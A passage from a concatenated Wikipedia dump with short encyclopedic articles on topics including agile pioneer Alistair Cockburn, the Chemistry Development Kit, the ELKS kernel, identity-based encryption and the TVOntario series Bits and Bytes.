In May 2016, the Isle of Man Steam Packet Company outlined plans to replace the Ben-my-Chree as part of their proposed Strategic Sea Services offer to the Isle of Man Government. Under the proposal, the 1998-built Ben-my-Chree would be "replaced by 2019–2021" with a new build vessel that would be 140-metres long and have a capacity of 800 passengers. The Ben-my-Chree would then be retained as a third vessel to offer cover to the fleet.
On 1 December 2020 the replacement for the Ben-my-Chree was named MV Manxman. On Christmas Eve 2021 she was laid down at Hyundai Mipo Dockyard to be in commission by spring 2023.
References
Ships of the Isle of Man Steam Packet Company
Ferries of the Isle of Man
Merchant ships of the Isle of Man
1998 ships
Ships built in the Netherlands
Passenger ships of the United Kingdom
|
5126682
|
https://en.wikipedia.org/wiki/Alistair%20Cockburn
|
Alistair Cockburn
|
Alistair Cockburn is an American computer scientist, known as one of the initiators of the agile movement in software development. He cosigned (with 17 others) the Manifesto for Agile Software Development.
Life and career
Cockburn started studying the methods of object oriented (OO) software development for IBM. From 1994, he formed "Humans and Technology" in Salt Lake City. He obtained his degree in computer science at the Case Western Reserve University. In 2003 he received his PhD degree from the University of Oslo.
Cockburn helped write the Manifesto for Agile Software Development in 2001, the agile PM Declaration of Interdependence in 2005, and co-founded the International Consortium for Agile in 2009 (with Ahmed Sidky and Ash Rofail). He is a principal expositor of the use case for documenting business processes and behavioral requirements for software, and inventor of the Cockburn Scale for categorizing software projects.
The methodologies in the Crystal family (e.g., Crystal Clear), described by Alistair Cockburn, are considered examples of lightweight methodology. The Crystal family is colour-coded to signify the "weight" of methodology needed. Thus, a large project which has consequences that involve risk to human life would use the Crystal Sapphire or Crystal Diamond methods. A small project might use Crystal Clear, Crystal Yellow or Crystal Orange.
Cockburn presented his Hexagonal Architecture (2005) as a solution to problems with traditional layering, coupling and entanglement.
In 2015 Alistair launched the Heart of Agile movement which is presented as a response to the overly complex state of the Agile industry.
Selected publications
Surviving Object-Oriented Projects, Alistair Cockburn, 1st edition, December, 1997, Addison-Wesley Professional, .
Writing Effective Use Cases, Alistair Cockburn, 1st edition, January, 2000, Addison-Wesley Professional, .
Agile Software Development, Alistair Cockburn, 1st edition, December 2001, Addison-Wesley Professional, .
Patterns for Effective Use Cases, Steve Adolph, Paul Bramble, with Alistair Cockburn, Andy Pols contributors, August 2002, Addison-Wesley Professional, .
People and Methodologies in Software Development, Alistair Cockburn, February 2003, D.Ph. dissertation, University of Oslo Press
Crystal Clear : A Human-Powered Methodology for Small Teams, Alistair Cockburn, October 2004, Addison-Wesley Professional, .
Agile Software Development: The Cooperative Game, Alistair Cockburn, 2nd edition, October 2006, Addison-Wesley Professional, , .
References
External links
Website
Living people
American computer programmers
American technology writers
Alistair
1953 births
Case Western Reserve University alumni
University of Oslo alumni
People from Salt Lake City
Agile software development
|
65713407
|
https://en.wikipedia.org/wiki/Naval%20Information%20Warfare%20Systems%20Command%20Program%20Executive%20Offices
|
Naval Information Warfare Systems Command Program Executive Offices
|
The Naval Information Warfare Systems Command Program Executive Offices (PEOs) are organizations responsible for the prototyping, procurement, and fielding of C4ISR (Command, Control, Communications, Computers, Intelligence, Surveillance and Reconnaissance), business information technology and space systems. Their mission is to develop, acquire, field and sustain affordable and integrated state of the art equipment for the Navy.
The Naval Information Warfare Systems Command is organizationally aligned to the Chief of Naval Operations. As part of its mission, NAVWAR provides support, manpower, resources, and facilities to its aligned Program Executive Offices (PEOs). The Program Executive Offices are responsible for the execution of major defense acquisition programs. The PEOs are organizationally aligned to the Assistant Secretary of the Navy for Research, Development and Acquisition (ASN(RDA)). The Naval Information Warfare PEOs operate under NAVWAR policies and procedures.
There are three Naval Information Warfare Systems Program Executive Offices.
Program Executive Office Command, Control, Communications, Computers and Intelligence (PEO C4I) and Space Systems
PEO(C4I) provides the Navy and Marine Corps with affordable, integrated and interoperable Information Warfare capability.
The Program Executive Officer for PEO(C4I) is RDML Kurt J. Rothenhaus, USN, who assumed this post in May 2020.
PEO(C4I) comprises ten major program offices:
PMA-120: Battlespace Awareness and Information Operations Program
PMA-130: Information Assurance and Cyber Security Program
PMA-150: Command and Control Program
PMA-160: Tactical Networks Program
PMA-170: Communications and GPS Navigation Program
PMA-740: International C4I Integration Program
PMA-750: Carrier and Air Integration Program
PMA-760: Ship Integration Program
PMA-770: Undersea Communications and Integration Program
PMA-790: Shore and Expeditionary Integration Program
Program Executive Office for Digital and Enterprise Services (PEO Digital)
PEO(Digital) provides the Navy and Marine Corps with a portfolio of enterprise-wide information technology programs designed to enable common business processes and provide standard IT capabilities. PEO Digital is digitally transforming systems to evolve and deliver modern capabilities and technologies.
The Program Executive Officer for PEO(Digital) is Ruth Youngs Lew.
PEO Digital was established in May 2020 following the disestablishment of the Program Executive Office for Enterprise Information Systems. The PEO EIS offices relating to networks, enterprise services and digital infrastructure were transitioned to PEO Digital. The program offices relating to manpower, logistics and other business solutions were transitioned to PEO Manpower, Logistics and Business Solutions.
PEO(Digital) comprises five major program offices:
PMA-205: Naval Enterprise Network (NEN) Program
PMA-260: Special Networks and Intelligence Mission Applications (SNIMA) Program
PMA-270: Navy Commercial Cloud Services (NCCS) Program
PMA-280: Special Access Programs (SAP)
PMA-290: Enterprise IT Strategic Sourcing (EITSS) Program
Program Executive Office Manpower, Logistics and Business Solutions (PEO MLB)
PEO(MLB) provides the Navy and Marine Corps with a portfolio of information technology programs designed to enable common business processes at sea and in the field.
The Program Executive Officer for PEO(MLB) is Lesley L. Hubbard.
PEO MLB was established in May 2020 following the disestablishment of the Program Executive Office for Enterprise Information Systems. The PEO EIS offices relating to networks, enterprise services and digital infrastructure were transitioned to PEO Digital. The program offices relating to manpower, logistics and other business solutions were transitioned to PEO Manpower, Logistics and Business Solutions.
PEO(MLB) comprises five major program offices:
PMW-220: Navy Enterprise Business Solutions (Navy EBS) Program
PMW-230: Logistics Integrated Information Solutions - Marine Corps (GCSS-MC) Program
PMW-240: Sea Warrior Program
PMW-250: Enterprise Systems and Services (E2S) Program
PMW-444: Navy Maritime Maintenance Enterprise Solution (NMMES) Technical Refresh (TR) Program Program
See also
Marine Corps Systems Command
Naval Air Systems Command
Naval Facilities Engineering Command
Naval Information Warfare Systems Command
Naval Sea Systems Command
Naval Supply Systems Command
Footnotes
Shore commands of the United States Navy
|
4604270
|
https://en.wikipedia.org/wiki/Chemistry%20Development%20Kit
|
Chemistry Development Kit
|
The Chemistry Development Kit (CDK) is computer software, a library in the programming language Java, for chemoinformatics and bioinformatics. It is available for Windows, Linux, Unix, and macOS. It is free and open-source software distributed under the GNU Lesser General Public License (LGPL) 2.0.
History
The CDK was created by Christoph Steinbeck, Egon Willighagen and Dan Gezelter, then developers of Jmol and JChemPaint, to provide a common code base, on 27–29 September 2000 at the University of Notre Dame. The first source code release was made on 11 May 2011. Since then more than 100 people have contributed to the project, leading to a rich set of functions, as given below. Between 2004 and 2007, CDK News was the project's newsletter of which all articles are available from a public archive. Due to an unsteady rate of contributions, the newsletter was put on hold.
Later, unit testing, code quality checking, and Javadoc validation was introduced. Rajarshi Guha developed a nightly build system, named Nightly, which is still operating at Uppsala University. In 2012, the project became a support of the InChI Trust, to encourage continued development. The library uses JNI-InChI to generate International Chemical Identifiers (InChIs).
In April 2013, John Mayfield (né May) joined the ranks of release managers of the CDK, to handle the development branch.
Library
The CDK is a library, instead of a user program. However, it has been integrated into various environments to make its functions available. CDK is currently used in several applications, including the programming language R, CDK-Taverna (a Taverna workbench plugin), Bioclipse, PaDEL, and Cinfony. Also, CDK extensions exist for Konstanz Information Miner (KNIME) and for Excel, called LICSS ().
In 2008, bits of GPL-licensed code were removed from the library. While those code bits were independent from the main CDK library, and no copylefting was involved, to reduce confusions among users, the ChemoJava project was instantiated.
Major features
Chemoinformatics
2D molecule editor and generator
3D geometry generation
ring finding
substructure search using exact structures and Smiles arbitrary target specification (SMARTS) like query language
QSAR descriptor calculation
fingerprint calculation, including the ECFP and FCFP fingerprints
force field calculations
many input-output chemical file formats, including simplified molecular-input line-entry system (SMILES), Chemical Markup Language (CML), and chemical table file (MDL)
structure generators
International Chemical Identifier support, via JNI-InChI
Bioinformatics
protein active site detection
cognate ligand detection
metabolite identification
pathway databases
2D and 3D protein descriptors
General
Python wrapper; see Cinfony
Ruby wrapper
active user community
See also
Bioclipse – an Eclipse–RCP based chemo-bioinformatics workbench
Blue Obelisk
JChemPaint – Java 2D molecule editor, applet and application
Jmol – Java 3D renderer, applet and application
JOELib – Java version of Open Babel, OELib
List of free and open-source software packages
List of software for molecular mechanics modeling
References
External links
CDK Wiki – the community wiki
Planet CDK - a blog planet
CDK Google+ page
OpenScience.org
Bioinformatics software
Chemistry software for Linux
Computational chemistry software
Free chemistry software
Free software programmed in Java (programming language)
|
308939
|
https://en.wikipedia.org/wiki/Agrep
|
Agrep
|
agrep (approximate grep) is an open-source approximate string matching program, developed by Udi Manber and Sun Wu between 1988 and 1991, for use with the Unix operating system. It was later ported to OS/2, DOS, and Windows.
It selects the best-suited algorithm for the current query from a variety of the known fastest (built-in) string searching algorithms, including Manber and Wu's bitap algorithm based on Levenshtein distances.
agrep is also the search engine in the indexer program GLIMPSE. agrep is under a free ISC License.
Alternative implementations
A more recent agrep is the command-line tool provided with the TRE regular expression library. TRE agrep is more powerful than Wu-Manber agrep since it allows weights and total costs to be assigned separately to individual groups in the pattern. It can also handle Unicode. Unlike Wu-Manber agrep, TRE agrep is licensed under a 2-clause BSD-like license.
FREJ (Fuzzy Regular Expressions for Java) open-source library provides command-line interface which could be used in the way similar to agrep. Unlike agrep or TRE it could be used for constructing complex substitutions for matched text. However its syntax and matching abilities differs significantly from ones of ordinary regular expressions.
See also
Bitap algorithm
TRE (computing)
References
External links
Wu-Manber agrep
AGREP home page
For Unix (To compile under OSX 10.8, add -Wno-return-type to the CFLAGs = -O line in the Makefile)
See also
TRE regexp matching package
cgrep a defunct command line approximate string matching tool
nrgrep a command line approximate string matching tool
agrep as implemented in R
Information retrieval systems
Unix text processing utilities
Software using the ISC license
|
8769086
|
https://en.wikipedia.org/wiki/Southern%20California%20Linux%20Expo
|
Southern California Linux Expo
|
The Southern California Linux Expo (SCALE) is an annual Linux, open source and free software conference held in Los Angeles, California, since 2002. Despite having Linux in its name, SCALE covers all open source operating systems and software. It is a volunteer-run event.
The event features an expo floor with both commercial and non-profit exhibitors, as well as 4 days of seminars on the topic of Linux and Open Source software. Sessions and presentations cover a broad spectrum of topics and technical levels.
SCALE grew out of a series of LUGFests put on by the Simi Conejo Linux Users Group in the late 90s. There were four of them, held every 6 months at the Nortel development facility in Simi Valley, California. They ended when Nortel closed that facility in 2001. Subsequently, members from SCLUG, USCLUG and UCLALUG organized to create a more regional event, which they named the Southern California Linux Expo.
Companies, organizations and projects represented at SCALE include Linux-based projects such as Debian, Gentoo Linux, the Fedora Project, KDE and GNOME, other open-source operating systems including NetBSD and FreeBSD, software projects such as Django, open-source database systems such as MySQL and PostgreSQL, other open-source applications such as Drupal, Inkscape, MythTV and The Document Foundation, activist organizations such as Software Freedom Law Center and the Electronic Frontier Foundation, major technology companies such as IBM, HP and Sharp, web companies including Google, Facebook and eHarmony, and internet projects including OpenStreetMap.
Locations and dates
External links
Southern California Linux Expo - Official Website
Interview: Organizing SCALE with Free Software
Interview with SCALE organizers
Gaining Ground and Growing: SCALE 9x
SCALE 9X Across the Snowy Horizon
Linux conferences
Linux user groups
Free-software events
Recurring events established in 2002
2002 establishments in California
|
50152037
|
https://en.wikipedia.org/wiki/Adobe%20XD
|
Adobe XD
|
Adobe XD (also known as Adobe Experience Design) is a vector-based user experience design tool for web apps and mobile apps, developed and published by Adobe Inc. It is available for macOS and Windows, although there are versions for iOS and Android to help preview the result of work directly on mobile devices. Adobe XD enables website wireframing and creating click-through prototypes.
History
Adobe first announced that they were developing a new interface design and prototyping tool under the name "Project Comet" at the Adobe MAX conference in October 2015. This was in response to the rising popularity of Sketch, a UX and UI design-focused vector editor, released in 2010.
The first public beta was released for macOS as "Adobe Experience Design CC" to anyone with an Adobe account, on March 14, 2016. A beta of Adobe XD was released for Windows 10 on December 13, 2016. On October 18, 2017, Adobe announced that Adobe XD was out of beta.
Features
Adobe XD creates user interfaces for mobile and web apps. Many features in XD were previously either hard to use or nonexistent in other Adobe applications like Illustrator or Photoshop.
Repeat grid
Helps creating a grid of repeating items such as lists, and photo galleries.
Prototype and animation
Creates animated prototypes through linking artboards. These prototypes can be previewed on supported mobile devices.
Interoperability
XD supports and can open files from Illustrator, Photoshop, Photoshop Sketch, and After Effects. In addition to the Adobe Creative Cloud, XD can also connect to other tools and services such as Slack and Microsoft Teams to collaborate. XD is also able to auto-adjust and move from macOS to Windows. For security, prototypes can be sent with password protection to ensure full disclosure.
Content-Aware Layout
Design and edit components without the nudging or the tinkering. Content-Aware Layout aligns and evenly-spaces as you add, remove, or resize objects. Make adjustments with smart controls and get back to exploring.
Voice design
Apps can be designed using voice commands. In addition, what users create for smart assistants can be previewed as well.
Components
Users can create components to create logos, buttons, and other assets for reuse. Their appearance can change with the context where they are used.
Responsive resize
Responsive resize automatically adjusts and sizes pictures and other objects on the artboards. This allows the user to have their content automatically adjusted for different screens for different sized platforms such as mobile phones and PCs.
Plugins
XD is compatible with custom plugins that add additional features and uses. Plugins range from design to functionality, automation and animation.
Design Education
Adobe offers educational articles, videos and live streams through various mediums to help designers learn Adobe XD and best practices.
Adobe XD Learn Hub
Launched in 2021, the Learn Hub is a resource for learning and exploring everything that Adobe XD offers – from the Getting Started series for beginners to advanced tips & tricks for designers looking to level up.
Adobe Live
With sessions just about every day of the week, Adobe Live – hosted on Behance – delivers online training for a variety of applications, including Photoshop, Illustrator, Adobe XD, and more.
Adobe MAX
Every year, Adobe MAX brings the creative community together with over 350 sessions, hand-on labs, luminary speakers and more. What was previously an in-person event has since transitioned online.
Alternatives
Sketch
Figma
Balsamiq Wireframes
icons8 Lunacy
References
External links
Adobe software
User interface builders
Web development software
|
17216329
|
https://en.wikipedia.org/wiki/Radiant%20Systems
|
Radiant Systems
|
Radiant Systems was a provider of technology to the hospitality and retail industries that was acquired by NCR Corporation in 2011. Radiant was based in Atlanta, Georgia. In its last financial report as a public company, Radiant reported revenues of $90 million and net income of $14 million in the six months ended 30 June 2011. At the time of its acquisition, Radiant employed over 1,300 people worldwide. Radiant had offices in North America, Europe, Asia and Australia.
Acquisitions
In May 1997, Radiant completed the joint acquisition of ReMACS, Inc., based in Pleasanton, CA, and Twenty/20 Visual Systems, based in Dallas, Texas. At this time, these acquisitions formed the core of Radiant Hospitality Systems, with 8,000 installed sites.
In October 1997, Radiant completed the acquisition of RapidFire Software, based in Hillsboro, OR, to expand its position in the Hospitality POS market.
In November 1997, Radiant completed the acquisition of Logic Shop, Inc. based in Atlanta, GA. Logic Shop is a provider of management software to automotive service centers.
In March 2000, Microsoft made an equity investment in Radiant Systems to assist with the development and marketing of an integrated Web-enabled management system and supply chain solution to enable retailers to conduct business-to-business e-commerce over the Internet (BlueCube).
In May 2001, Radiant bought Breeze Software, an Australian provider of point-of-sale and management systems solutions to retailers in the petroleum/convenience store industry.
In January 2004, Radiant sold its enterprise software business, now known as BlueCube Software, to Erez Goren, the company's former Co-Chairman of the Board and Co-Chief Executive Officer. Radiant retained the right to sell and market the Enterprise Productivity Suite, including functionality such as workforce and supply chain management, through a reseller agreement with BlueCube Software.
Also in 2004, Radiant bought Aloha Technologies, a provider of point of sale systems for the hospitality industry, located in Dallas, Texas, and E-Needs, the leading provider of Film Management software and services in the North American exhibition industry, based in Irvine, California.
In October 2005, Radiant acquired MenuLink Computer Solutions, Inc., an independent suppliers of back-office software for the hospitality industry, located in Huntington Beach, California
In January 2006, Radiant acquired substantially all of the assets of Synchronics, Inc., a provider of business management and point of sale software for the retail market, located in Memphis, Tennessee.
In December 2007, Radiant announced it had entered into an agreement to acquire Quest Retail Technology, a provider of point of sale (POS) and back office solutions to stadiums, arenas, convention centers, race courses, theme parks, restaurants, bars and clubs.
In April 2008, Radiant acquired Hospitality EPoS Systems, a technology supplier to the U.K. hospitality market since 1992.
In May 2008, Radiant also acquired Jadeon, Inc., one of Radiant's resellers located in California. The company reports the operations of Hospitality EPoS Systems and Jadeon under the Hospitality segment.
In July 2008, Radiant acquired Orderman GmbH, which develops wireless handheld ordering and payment devices for the hospitality industry. Orderman is headquartered in Salzburg, Austria.
In July 2011, NCR Corporation announced plans to acquire Radiant Systems for US$1.2 Billion.
In August 2011, Radiant acquired Texas Digital Systems, Inc., a leader in order confirmation displays and digital signage solutions.
On 22 August 2011, Radiant announced the completion of the tender offer by NCR Corporation.
On 24 August 2011, NCR Corporation completed the acquisition of Radiant Systems.
References
Point of sale companies
Companies formerly listed on the Nasdaq
NCR Corporation
American companies established in 1985
2011 mergers and acquisitions
Manufacturing companies based in Atlanta
Defunct manufacturing companies based in Georgia (U.S. state)
|
7962372
|
https://en.wikipedia.org/wiki/Embeddable%20Linux%20Kernel%20Subset
|
Embeddable Linux Kernel Subset
|
The Embeddable Linux Kernel Subset (ELKS), formerly known as Linux-8086, is a Linux-like operating system kernel. It is a subset of the Linux kernel, intended for 16-bit computers with limited processor and memory resources such as machines powered by Intel 8086 and compatible microprocessors not supported by 32-bit Linux.
Features and compatibility
ELKS is free software and available under the GNU General Public License (GPL). It can work with early 16-bit and many 32-bit x86 (8088, 8086) computers like IBM PC compatible systems, and later x86 models in real mode. Another useful area are single board microcomputers, intended as educational tools for "homebrew" projects (hardware hacking), as well as embedded controller systems (e.g. Automation).
Early versions of ELKS also ran on Psion 3a and 3aR SIBO (SIxteen Bit Organiser) PDAs with NEC V30 CPUs, providing another possible field of operation (gadget hardware), if ported to such a platform. This effort was called ELKSibo. Due to lack of interest, SIBO support was removed from version 0.4.0.
Native ELKS programs may run emulated with Elksemu, allowing 8086 code to be used under Linux-i386. An effort to provide ELKS with an Eiffel compliant library also exists.
History
Development of Linux-8086 started in 1995 by Linux kernel developers Alan Cox and Chad Page as a fork of the standard Linux. By early 1996 the project was renamed ELKS (Embeddable Linux Kernel Subset), and in 1997 the first website www.elks.ecs.soton.ac.uk/ (offline, ) was created. ELKS version 0.0.63 followed on August 8 that same year. On June 22, 1999, ELKS release 0.0.77 was available, the first version able to run a graphical user interface (the Nano-X Window System). On July 21, ELKS booted on a Psion PDA with SIBO architecture. ELKS 0.0.82 came out on January 10, 2000. By including the SIBO port, it became the first official version running on other computer hardware than the original 8086 base. On March 3 that year, the project was registered on SourceForge, the new website being elks.sourceforge.net.
On January 6, 2001, Cox declared ELKS "basically dead". Nonetheless, release 0.0.84 came along on June 17, 2001, Charilaos (Harry) Kalogirou added TCP/IP networking support seven days later, and in the same year ELKS reached 0.0.90 on November 17. On April 20, 2002, Kalogirou added memory management with disk swapping capability, followed nine days later by ELKS release 0.1.0, considered the first beta version. By end of the year, on December 18, the EDE (Elks Distribution Edition, a distribution based on the ELKS kernel), itself version 0.0.5, is released. January 6, 2003, brought ELKS 0.1.2, an update to 0.1.3 followed on May 3, 2006, the first official release after a long hiatus in development.
A development into FlightLinux, a real-time operating system for spacecraft, was planned, but the project it was intended for (UoSAT-12) eventually settled on the qCF operating system from Quadron Corporation instead.
Current status and usage
Since January 2012 ELKS is again under development. The CVS repository was migrated to Git in February 2012, and numerous patches from the Linux-8086 mailing list were committed to the new repository. Version 0.1.4 came out on February 19, 2012, released by Jody Bruchon in memory of Riley Williams, a former co-developer. It included updated floppy disk images, fixing compilation bugs of the previous version and removing unused codes. On May 10, 2012, BusyELKS was added to the repository by Jody Bruchon in an attempt to replace stand-alone binaries and to take advantage of shared code (ELKS does not support shared libraries). BusyBox-like binaries attempt to save space with symbolic links, eliminating redundant chunks of code, and are combining separate programs into one bigger binary. On November 14, 2013, project development moved to GitHub. Rudimentary Ethernet and FAT support were added in 2017.
More than 35 developers have contributed to this project since the fork in 1995. As of March 2015, development of the ELKS project was again active, reaching a milestone 1,000 source code commits on March 8, 2015. As of June 2018, many bug fixes and improvements were performed with 583 more commits, leading to the 0.2.1 release. In March 2019, the project completed its transition from the obsolete BCC compiler to the more recent GCC-IA16, and development activity increased as Gregory Haerr took the helm as lead developer. During 2019 and 2020 ELKS moved from a 'bootable, unstable' status to a stable Linux-like system for small machines with Ethernet, TCP/IP, FAT16/32, multiuser serial and many more functions. As ELKS 0.4.0 was released in November 2020, the number of commits had passed 3,000.
Building on the foundation created by 0.4.0, development activity continued during 2021, still with Gregory Haerr as lead developer, supported by 5 active contributors. The team delivered 220 commits from October 2021 to 0.5.0 release on February 8th 2022.
Version 0.4.0
Version 0.4.0 represented a major milestone for ELKS, lifting the system from experimental to useful for non-developers, and included the following major enhancements:
Documentation Wiki
Major kernel enhancements – size, stability, robustness, speed, system calls and debugging features.
Reliable TCP/IP stack implemented as a user mode process, supporting TCP, ICMP, ARP.
User level networking support for telnet/telnetd and file transfer.
Serial IP and Ethernet (NE1K/NE2K/WD8003) support.
Many new and updated user level commands, including ash and sash shells.
Many cross development tool-chain enhancements supporting more memory models, easing porting of more applications.
Robust FAT16/32 and Minix1 file system support, including booting from /root on FAT file systems.
Improved console and serial support: Serial console, high speed multiple serial I/O.
MBR support, boot options via /bootopts.
Updated menu-system for configuration and building on Linux and MacOS, allowing non-developers to build custom images for floppies ranging from 360KB to 2.88MB.
Version 0.5.0
Version 0.5.0 was another significant milestone for ELKS with a number of important improvements, additions and support for 2 new platforms - the japanese PC-98 and 8018X. Enhancements included:
Kernel and network debugging tools, toolchain improvements, cleanups to ease porting to new platforms
Network stack stability and performance improvements
Native ftp/ftpd programs, expanding network application level protocol support to telnet, ftp, http and raw tcp (netcat)
Improved runtime configuration via /bootopts configuration file,
XMS-support for 386 and 286 systems, enabling high memory buffers
New SSD driver
Support for compressed executables
Support for very low memory environments (256k)
Library and system call enhancements
Kernel support for variable sector sizes (for PC-98 platform)
New startup configuration files for networking and mass storage
Improved networking support when running in QEMU
As of version 0.5.0 ELKS is a complete small-Linux system and a versatile tool for testing, diagnosing and running vintage PCs with limited resources. The improved portability demonstrated by the addition of new platforms, paves way for increased development activity towards the next version.
See also
IBM Personal Computer
TinyLinux
ucLinux
FUZIX, a Linux-like for 8-bit architectures
References
External links
Linux kernel
Monolithic kernels
Embedded Linux
Lightweight Unix-like systems
|
385892
|
https://en.wikipedia.org/wiki/Identity-based%20encryption
|
Identity-based encryption
|
ID-based encryption, or identity-based encryption (IBE), is an important primitive of ID-based cryptography. As such it is a type of public-key encryption in which the public key of a user is some unique information about the identity of the user (e.g. a user's email address). This means that a sender who has access to the public parameters of the system can encrypt a message using e.g. the text-value of the receiver's name or email address as a key. The receiver obtains its decryption key from a central authority, which needs to be trusted as it generates secret keys for every user.
ID-based encryption was proposed by Adi Shamir in 1984. He was however only able to give an instantiation of identity-based signatures. Identity-based encryption remained an open problem for many years.
The pairing-based Boneh–Franklin scheme and Cocks's encryption scheme based on quadratic residues both solved the IBE problem in 2001.
Usage
Identity-based systems allow any party to generate a public key from a known identity value such as an ASCII string. A trusted third party, called the Private Key Generator (PKG), generates the corresponding private keys. To operate, the PKG first publishes a master public key, and retains the corresponding master private key (referred to as master key). Given the master public key, any party can compute a public key corresponding to the identity by combining the master public key with the identity value. To obtain a corresponding private key, the party authorized to use the identity ID contacts the PKG, which uses the master private key to generate the private key for identity ID.
As a result, parties may encrypt messages (or verify signatures) with no prior distribution of keys between individual participants. This is extremely useful in cases where pre-distribution of authenticated keys is inconvenient or infeasible due to technical restraints. However, to decrypt or sign messages, the authorized user must obtain the appropriate private key from the PKG. A caveat of this approach is that the PKG must be highly trusted, as it is capable of generating any user's private key and may therefore decrypt (or sign) messages without authorization. Because any user's private key can be generated through the use of the third party's secret, this system has inherent key escrow. A number of variant systems have been proposed which remove the escrow including certificate-based encryption, secure key issuing cryptography and certificateless cryptography.
The steps involved are depicted in this diagram:
Protocol framework
Dan Boneh and Matthew K. Franklin defined a set of four algorithms that form a complete IBE system:
Setup: This algorithm is run by the PKG one time for creating the whole IBE environment. The master key is kept secret and used to derive users' private keys, while the system parameters are made public. It accepts a security parameter (i.e. binary length of key material) and outputs:
A set of system parameters, including the message space and ciphertext space and ,
a master key .
Extract: This algorithm is run by the PKG when a user requests his private key. Note that the verification of the authenticity of the requestor and the secure transport of are problems with which IBE protocols do not try to deal. It takes as input , and an identifier and returns the private key for user .
Encrypt: Takes , a message and and outputs the encryption .
Decrypt: Accepts , and and returns .
Correctness constraint
In order for the whole system to work, one has to postulate that:
Encryption schemes
The most efficient identity-based encryption schemes are currently based on bilinear pairings on elliptic curves, such as the Weil or Tate pairings. The first of these schemes was developed by Dan Boneh and Matthew K. Franklin (2001), and performs probabilistic encryption of arbitrary ciphertexts using an Elgamal-like approach. Though the Boneh-Franklin scheme is provably secure, the security proof rests on relatively new assumptions about the hardness of problems in certain elliptic curve groups.
Another approach to identity-based encryption was proposed by Clifford Cocks in 2001. The Cocks IBE scheme is based on well-studied assumptions (the quadratic residuosity assumption) but encrypts messages one bit at a time with a high degree of ciphertext expansion. Thus it is highly inefficient and impractical for sending all but the shortest messages, such as a session key for use with a symmetric cipher.
A third approach to IBE is through the use of lattices.
Identity-based encryption algorithms
The following lists practical identity-based encryption algorithms
Boneh–Franklin (BF-IBE).
Sakai–Kasahara (SK-IBE).
Boneh–Boyen (BB-IBE).
All these algorithms have security proofs.
Advantages
One of the major advantages of any identity-based encryption scheme is that if there are only a finite number of users, after all users have been issued with keys the third party's secret can be destroyed. This can take place because this system assumes that, once issued, keys are always valid (as this basic system lacks a method of key revocation). The majority of derivatives of this system which have key revocation lose this advantage.
Moreover, as public keys are derived from identifiers, IBE eliminates the need for a public key distribution infrastructure. The authenticity of the public keys is guaranteed implicitly as long as the transport of the private keys to the corresponding user is kept secure (authenticity, integrity, confidentiality).
Apart from these aspects, IBE offers interesting features emanating from the possibility to encode additional information into the identifier. For instance, a sender might specify an expiration date for a message. He appends this timestamp to the actual recipient's identity (possibly using some binary format like X.509). When the receiver contacts the PKG to retrieve the private key for this public key, the PKG can evaluate the identifier and decline the extraction if the expiration date has passed. Generally, embedding data in the ID corresponds to opening an additional channel between sender and PKG with authenticity guaranteed through the dependency of the private key on the identifier.
Drawbacks
If a Private Key Generator (PKG) is compromised, all messages protected over the entire lifetime of the public-private key pair used by that server are also compromised. This makes the PKG a high-value target to adversaries. To limit the exposure due to a compromised server, the master private-public key pair could be updated with a new independent key pair. However, this introduces a key-management problem where all users must have the most recent public key for the server.
Because the Private Key Generator (PKG) generates private keys for users, it may decrypt and/or sign any message without authorization. This implies that IBS systems cannot be used for non-repudiation. This may not be an issue for organizations that host their own PKG and are willing to trust their system administrators and do not require non-repudiation.
The issue of implicit key escrow does not exist with the current PKI system, wherein private keys are usually generated on the user's computer. Depending on the context key escrow can be seen as a positive feature (e.g., within Enterprises). A number of variant systems have been proposed which remove the escrow including certificate-based encryption, secret sharing, secure key issuing cryptography and certificateless cryptography.
A secure channel between a user and the Private Key Generator (PKG) is required for transmitting the private key on joining the system. Here, a SSL-like connection is a common solution for a large-scale system. It is important to observe that users that hold accounts with the PKG must be able to authenticate themselves. In principle, this may be achieved through username, password or through public key pairs managed on smart cards.
IBE solutions may rely on cryptographic techniques that are insecure against code breaking quantum computer attacks (see Shor's algorithm)
See also
ID-based cryptography
Identity-based conditional proxy re-encryption
Attribute-based encryption
References
External links
Seminar 'Cryptography and Security in Banking'/'Alternative Cryptology', Ruhr University Bochum, Germany
RFC 5091 - the IETF RFC defining two common IBE algorithms
HP Role-Based Encryption
The Pairing-Based Crypto Lounge
The Voltage Security Network - IBE encryption web service
Analyst report on the cost of IBE versus PKI
Public-key cryptography
Identity-based cryptography
fr:Schéma basé sur l'identité
ko:신원 기반 암호
ja:IDベース暗号
|
5459698
|
https://en.wikipedia.org/wiki/Bits%20and%20Bytes
|
Bits and Bytes
|
Bits and Bytes was the name of two Canadian educational television series produced by TVOntario that taught the basics of how to use a personal computer.
The first series, made in 1983, starred Luba Goy as the Instructor and Billy Van as the Student. Bits and Bytes 2 was produced in 1991 and starred Billy Van as the Instructor and Victoria Stokle as the Student. The Writer-Producers of both Bits and Bytes and Bits and Bytes 2 were Denise Boiteau & David Stansfield.
Title sequence
The intro sequence featured a montage of common computer terms such as "ERROR", "LOGO" and "ROM", as well as various snippets of simple computer graphics and video effects, accompanied by a theme song that very heavily borrows from the 1978 song "Neon Lights" by Kraftwerk.
Series format
The first series featured an unusual presentation format whereby Luba Goy as the instructor would address Billy Van through a remote video link. The video link would appear to Luba who was seated in an office on a projection screen in front of her. She was then able to direct Billy, who appeared on a soundstage with various desktop computer setups of the era. Popular systems emphasized included the Atari 800, Commodore PET, Tandy TRS-80, and Apple II. Each episode also included short animated vignettes to explain key concepts, as well as videotaped segments on various developments in computing.
In 1983 TVOntario included the show's episodes as part of a correspondence course. The original broadcasts on TVOntario also had a companion series, The Academy, that was scheduled immediately afterward in which Bits and Bytes technology consultant, Jim Butterfield, appeared as co-host to further elaborate on the concepts introduced in the main series.
Bits and Bytes 2
In the second Bits and Bytes series, produced almost a decade later, Billy Van assumed the role of instructor and taught a new female student. The new series focused primarily on IBM PC compatibles (i.e. Intel-based 286 or 386 computers) running DOS and early versions of Windows, as well as the newer and updated technologies of that era. For that series, a selection of the original's animated spots are reaired to illustrate fundamental computer technology principles along with a number of new spots to cover newly emerged concepts of computer technology such as advances in computer graphics and data management.
Although the possibility of a Bits and Bytes 3 was suggested at the end of the second series, TVOntario eventually elected instead to rebroadcast the Knowledge Network computer series, Dotto's Data Cafe, as a more economical and extensive production on the same subject.
Episodes (1983-84)
Program 1: Getting Started
Program 2: Ready-Made Programs
Program 3: How Programs Work?
Program 4: File & Data Management
Program 5: Communication Between Computers
Program 6: Computer Languages
Program 7: Computer-Assisted Instruction
Program 8: Games & Simulations
Program 9: Computer Graphics
Program 10: Computer Music
